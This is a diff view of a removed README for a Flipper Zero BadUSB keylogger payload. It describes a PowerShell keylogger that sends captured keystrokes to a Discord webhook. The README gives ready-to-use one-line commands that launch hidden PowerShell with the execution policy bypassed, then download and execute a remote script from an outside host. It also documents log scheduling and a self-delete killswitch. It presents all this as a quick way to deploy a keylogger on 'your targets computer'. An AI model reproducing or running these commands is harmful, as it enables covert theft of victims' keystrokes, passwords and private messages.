🤬
  • ■ ■ ■ ■ ■ ■
    Payloads/Flip-Keylogger/README.md
    1  -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
    2  - 
    3  -<!-- TABLE OF CONTENTS -->
    4  -<details>
    5  - <summary>Table of Contents</summary>
    6  - <ol>
    7  - <li><a href="#Description">Description</a></li>
    8  - <li><a href="#getting-started">Getting Started</a></li>
    9  - <li><a href="#Contributing">Contributing</a></li>
    10  - <li><a href="#Version-History">Version History</a></li>
    11  - <li><a href="#Contact">Contact</a></li>
    12  - <li><a href="#Acknowledgments">Acknowledgments</a></li>
    13  - </ol>
    14  -</details>
    15  - 
    16  -# Keylogger (CURRENTLY DETECTED - UPDATING ASAP)
    17  - 
    18  -This is a Powershell based keylogger that exfiltrates the logs to discord webhook
    19  - 
    20  -## Description
    21  - 
    22  -Quickly with just ONE line of code you can deploy a keylogger on your targets computer
    23  - 
    24  -Complete with custom logging times, and self destruct feature
    25  - 
    26  -Just move the `keylogger.txt` file over to your flipper and you are good to go
    27  - 
    28  -## Getting Started
    29  - 
    30  -### Dependencies
    31  - 
    32  -* Windows 10,11
    33  - 
    34  -<p align="right">(<a href="#top">back to top</a>)</p>
    35  - 
    36  -### Executing program
    37  - 
    38  -* Plug in your device
    39  -* 15 seconds later you have their keystrokes being sent to you
    40  - 
    41  -This is the basic command to install the keylogger and provide the webhook for the keystrokes to be sent back to you
    42  - 
    43  -* `$dc=''` is the variable where you plug in your discord webhook
    44  - 
    45  -```
    46  -powershell -w h -NoP -Ep Bypass $dc='https://link.iamjakoby.com/xxxx';iwr "https://jakoby.lol/m2m" | iex
    47  -```
    48  -### ADDITIONAL PARAMETERS
    49  - 
    50  -The payload is set to send the logs collected every hour on the hour
    51  - 
    52  -* You maybe use the `$log` variable to specify a certain time instead (Use this for testing)
    53  -* ex: `$log="09:00 pm"` <-- This will send the log every night at 9pm
    54  - 
    55  -You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date
    56  - 
    57  -`$ks="12/25/2022 10:00:00 PM"` <-- This will make the keylogger self delete at 10pm on December 25th
    58  - 
    59  -Calling the script with both a `log` time and `killswitch` will look something like this:
    60  -
    61  -```
    62  -powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='09:00 pm';$ks='12/25/2022 10:00:00 PM';iwr 'https://jakoby.lol/m2m' | iex"
    63  -```
    64  -### DELETING THE KEYLOGGER
    65  - 
    66  -Just hold `Left Control` + `Right Control` for 5 seconds untill the notification box pops up
    67  - 
    68  -<img src= https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/keylogger/kkl.png width="400" alt="C#" />
    69  - 
    70  - 
    71  - 
    72  -<p align="right">(<a href="#top">back to top</a>)</p>
    73  - 
    74  -## Contributing
    75  - 
    76  -All contributors names will be listed here
    77  - 
    78  -I am Jakoby
    79  - 
    80  -<p align="right">(<a href="#top">back to top</a>)</p>
    81  - 
    82  -## Version History
    83  - 
    84  -* 0.1
    85  - * Initial Release
    86  - 
    87  -<p align="right">(<a href="#top">back to top</a>)</p>
    88  - 
    89  -<!-- CONTACT -->
    90  -## Contact
    91  - 
    92  -<h2 align="center">📱 My Socials 📱</h2>
    93  -<div align=center>
    94  -<table>
    95  - <tr>
    96  - <td align="center" width="96">
    97  - <a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
    98  - <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
    99  - </a>
    100  - <br>YouTube
    101  - </td>
    102  - <td align="center" width="96">
    103  - <a href="https://twitter.com/I_Am_Jakoby">
    104  - <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
    105  - </a>
    106  - <br>Twitter
    107  - </td>
    108  - <td align="center" width="96">
    109  - <a href="https://www.instagram.com/i_am_jakoby/">
    110  - <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
    111  - </a>
    112  - <br>Instagram
    113  - </td>
    114  - <td align="center" width="96">
    115  - <a href="https://discord.gg/MYYER2ZcJF">
    116  - <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
    117  - </a>
    118  - <br>Discord
    119  - </td>
    120  - <td align="center" width="96">
    121  - <a href="https://www.tiktok.com/@i_am_jakoby?lang=en">
    122  - <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/tiktok.svg width="48" height="48" alt="Jsonnet" />
    123  - </a>
    124  - <br>TikTok
    125  - </td>
    126  - </tr>
    127  -</table>
    128  -</div>
    129  - 
    130  - 
    131  - 
    132  -<p align="right">(<a href="#top">back to top</a>)</p>
    133  - 
    134  -<!-- ACKNOWLEDGMENTS -->
    135  -## Acknowledgments
    136  - 
    137  -* [Hak5](https://hak5.org/)
    138  -* [MG](https://github.com/OMG-MG)
    139  - 
    140  -<p align="right">(<a href="#top">back to top</a>)</p>
    141  - 
    142  - 
Please wait...
Page is in error, reload to recover